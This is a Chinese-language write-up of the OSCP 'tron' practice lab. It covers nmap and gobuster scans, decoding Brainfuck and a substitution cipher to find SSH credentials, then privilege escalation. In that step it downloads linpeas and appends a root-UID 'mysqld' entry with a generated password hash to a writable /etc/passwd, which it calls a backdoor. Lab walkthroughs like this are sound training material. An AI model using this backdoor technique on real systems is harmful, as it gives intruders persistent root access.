OSCP 靶场
靶场介绍
|
tron |
easy |
敏感信息收集、Brainfuck解密、替换密码、ssh利用、passwd提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.212
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-28 21:21 EST
Nmap scan report for 192.168.1.212
Host is up (0.00094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1f:ed:64:93:84:b5:b2:e8:af:5a:0e:6f:52:af:4b:48 (RSA)
| 256 3d:df:6f:02:13:9e:15:f8:51:94:30:f8:45:e3:f2:93 (ECDSA)
|_ 256 2f:f4:af:e1:f4:c4:a5:3b:50:bb:e5:b9:2a:9f:39:de (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Master Control Program
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:00:D6:3B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.94 ms 192.168.1.212
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.212 -x php,txt,html -e=====================================================
http://192.168.1.212/.html (Status: 403) [Size: 278]
http://192.168.1.212/index.html (Status: 200) [Size: 309]
http://192.168.1.212/img (Status: 301) [Size: 312] [--> http://192.168.1.212/img/]
http://192.168.1.212/manual (Status: 301) [Size: 315] [--> http://192.168.1.212/manual/]
http://192.168.1.212/robots.txt (Status: 200) [Size: 623]
http://192.168.1.212/font (Status: 301) [Size: 313] [--> http://192.168.1.212/font/]
http://192.168.1.212/.html (Status: 403) [Size: 278]
http://192.168.1.212/MCP (Status: 301) [Size: 312] [--> http://192.168.1.212/MCP/]
http://192.168.1.212/server-status (Status: 403) [Size: 278]
首页html源码有一对类似账号密码的
这里有一个substitute密码暂时不知道是什么用处,先放着
substitute
--------------------------
plaintext
abcdefghijklmnopqrstuvwxyz
ciphertext
zyxwvutsrqponmlkjihgfedcba
--------------------------
这里发现一串base64编码,解码后是一串Brainfuck代码
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.Brainfuck 是一种极简主义的编程语言,由 Urban Müller 在 1993 年创建。它被设计成极其紧凑,只包含八种简单的指令。Brainfuck 的目标是通过极简的语法展示图灵完备性,即能够表达任何可以通过图灵机实现的计算。
Brainfuck 的指令集包括:
-
>:将指针指向当前内存单元的下一个单元。
-
<:将指针指向当前内存单元的上一个单元。
-
+:将当前内存单元的值加一。
-
-:将当前内存单元的值减一。
-
[:如果当前内存单元的值为零,则跳转到对应的 ] 否则继续执行下一条指令。
-
]:如果当前内存单元的值不为零,则跳转到对应的 [ 否则继续执行下一条指令。
-
.:输出当前内存单元的 ASCII 值对应的字符。
-
,:从输入中读取一个字符,存储到当前内存单元。
Brainfuck 的代码看起来晦涩难懂,但由于其极简的特性,它适用于一些编程挑战和谜题。虽然不常用于实际编程任务,但它在计算机科学教育和编程语言理论中有一定的影响。
解码后是player
http://www.hiencode.com/brain.html
https://ctfever.uniiem.com/tools/brain-fuck
这里结合上面所发现的信息对一开始发现的密码进行解密,获得一个密码
权限获取
使用上面加密的账号密码成功获取权限
权限提升
使用linpeas脚本发现passwd 有写入权限,那么我们可以直接写入一个root权限的用户或者更改他的账号密码
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
passwd写入
1、kali 生成密码
perl -e 'print crypt("123456", "AA"). "n"'
AASwmzPNx.3sg //密码:123456 ,AA 为盐
或者
生成密码: openssl passwd -1 -salt admin 123456
-1 的意思是使用md5crypt加密算法
-salt 指定盐为admin
123456 明文密码
2、生成后构造passwd文件中的条目
mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash
3、在被控制机器上添加后门
echo "mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash" >> /etc/passwd
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】tron
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论